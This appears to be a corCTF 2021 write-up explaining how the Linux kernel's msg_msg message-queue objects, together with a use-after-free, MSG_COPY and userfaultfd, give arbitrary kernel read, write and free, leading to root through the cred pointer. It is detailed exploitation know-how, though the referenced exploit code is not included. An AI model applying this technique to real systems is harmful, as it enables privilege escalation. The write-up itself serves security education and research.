In corCTF 2021, D3v17 and I wrote two kernel challenges utilizing a technique that is novel at least to our knowledge to gain arb read and arb write in kernel land: Fire of Salvation and Wall of Perdition. A famous kernel object often abused for heap sprays is the msg_msg struct, which is an elastic kernel object meant for IPC purposes (System V message queues) that has a size ranging from the kmalloc 64 to the kmalloc 4k. There was also a recent CVE exploit writeup by Linux kernel developer and security researcher Alexander Popov in which he abused msg_msg for arb read in his exploit for CVE-2021-26708. D3v17 and I read this, and posed the question to ourselves, is it possible to achieve arbitrary write in this across any valid slab for msg_msg? After a week or two of digging around, not only did we discover a way to achieve arb write on kmalloc 4k slabs, but we also discovered a way to do this for any valid msg_msg slab. In this post, I'll detail the Fire of Salvation writeup, which covers arb write on kmalloc 4k slabs. I'll also provide a tldr with the insights for any valid msg_msg arb write with a summary of my approach for the second challenge, but D3v17 will detail that out in his post for Wall of Perdition. Since this writeup is quite long, feel free to let me know of any unclear explanations or mistakes.
In this challenge, the following key protections were enabled on a 5.8 kernel: FG-KASLR, SLAB_RANDOM, SLAB_HARDENED, and STATIC_USERMODE_HELPER. The SLAB allocator was also being used, with a corresponding kernel.config file provided with all the extra other tidbits and miscellaneous hardening options (such as enabling the userfaultfd syscall, hardened_usercopy, CHECKPOINT_RESTORE, etc.). SMAP, SMEP, and KPTI being on was a given. Also, since our goal was to introduce players to a novel exploitation technique, we didn't really care much about the reversing procedure to find a bug, and didn't want to complexify the bug. In our discussions, we decided to just make the bug a pretty obvious UAF that limits them to around 0x28 to 0x30 of UAF write. (no UAF read). This was the source we provided to all the players (we were also nice enough to give out a vmlinux with debug symbols and structs):
Exploitation wise, there are a few serious roadblocks that would prevent common exploit paths and necessitate the need for good arb read and arb write primitivies. The fact that it is using the SLAB allocator means that no freelist pointer will be on the chunks themselves (and even if they were, they probably won't be within the 0x30 UAF region as the Linux kernel have moved them down for certain slabs). FG-KASLR will complicate the ability to overwrite function pointers (such as the one on the sk_buff struct's destructor arg callback in the CVE writeup), as most gadgets not in the earlier parts of .text will be affected; ROP is still possible, but I believe that would entail first arb reading the ksymtab for the function for whichever the gadget is relative to. Lastly, with STATIC_USERMODE_HELPER (and its path set to “”), the classic SMAP bypasses of targeting modprobe_path or core_pattern no longer work. The path itself is now located in a read only section of the kernel according to readelf. At this point, the most direct way to then bypass SMAP is to probably arb read the doubly linked list of task structures to find the current task, and overwrite the cred pointer to one that would give us root privileges. A physmap spray would be another common approach, but that's just painful.
Do note again that the vulnerability only gives a small window of UAF write, without UAF read. Once you allocate a few chunks to help smooth out the SLAB shuffling on the current slab, we can begin the exploitation procedure. Let's first take a detour into msg_msg (these manpages can be quite helpful). I do consistently use the IPC_NOWAIT option to avoid hangs and a msgtyp of zero to pull from the front of the msg_queue. For reference, here is the msg_msg struct:
Looking at do_msgsnd:
Now, let's take a look at do_msgrcv:
Now, let us think about abusing a UAF over these elastic objects for arb read and arb write. By modifying the next pointer or the size, arb read via msg_msg should be quite trivial, except for the fact that unlinking it from the queue (unless you can somehow skip modifying the first few qwords which you can't in this challenge) would destroy it. You can try to modify size so maybe it can leak more data from the next segment of the msg_msg object, but hardened usercopy would stop you dead in your tracks. However, this is where MSG_COPY comes into play. Not only does it not unlink your message, but it also uses memcpy for the initial copying of data! So now, we can happily modify the next pointer and change the m_ts field. This technique has already been documented in Popov's CVE writeup. The only restriction is that your next segment has to start with a null qword to avoid kernel panics or having it go somewhere you do not want it to go to.
How would we approach arb write then? This is where every Linux kernel exploit developer's good friend userfaultfd comes back (rip to the new unprivileged userfaultfd settings from 5.11 and forwards). During the msgsnd process, if you manage to have a UAF over the first part of the msg_msg object, you can have it copy over data for a message request that requires more than just one allocation. Then, if you abuse userfaultfd to hang the copy right before it pulls the value of the next pointer (such as when it's a few bytes away from copying everything into the first chunk), you can use the UAF to change this next pointer, and you can achieve arbitrary write once you release the hang! Of course, just like arb read, this requires the target region to start with a null qword. To make this clearer, take a look at the following diagram:
As for the Wall of Perdition challenge, I will only provide a brief summary of my solution, which I believe might slightly differ from D3v17's. His post on this part will be much more detailed, with many more diagrams to come.
In this second part, the sizes are limited to kmalloc-64; I wasn't aware of any commonly known abusable structures in this range. While arb read is still quite trivial thanks to MSG_COPY, using it to get a kernel base leak with FG-KASLR is not as easy. Arb write becomes even harder as well.
Now, for arb write, I reused the target queue earlier, cleared the large msg out from it, and replaced it with a msg_msg object that has two 4k chunks in its chain (this is getting quite close to the default msg_msg size limit). I can abuse the previous technique to then leak the address of this new 4k msg_msg object along with the address of its msg segment. Then, I freed this large object with msgrcv (and we will get them back in the order of leaked segment address and then the leaked msg_msg object due to LIFO). I msgsnd again a size of a message that requires two 4k chunks, and hang it with userfaultfd on load_msg, and quickly arb free its segment via the msg_msg under UAF control in the front queue via msgrcv. No crashes will occur since I fixed its pointers to go right back to the front queue itself.
Upon this arb free primitive, I send another message in another message queue that was previously allocated; it will also be hanged when reading in userland data. The object will just be of enough size to cover a 4k chunk (to get back the last freed chunk due to LIFO) chained with a small segment linked along. I let the data transfer from the original hang to continue, which gives me the ability to overwrite the next pointer of the currently allocated msg_msg object, thereby giving me arb write once I let this second hang continue and finish off. This might seem quite insane, but I promise you that D3v17's blogpost will make this quite clear with his diagrams.
Here is my final exploit, which only had about a 50% success rate.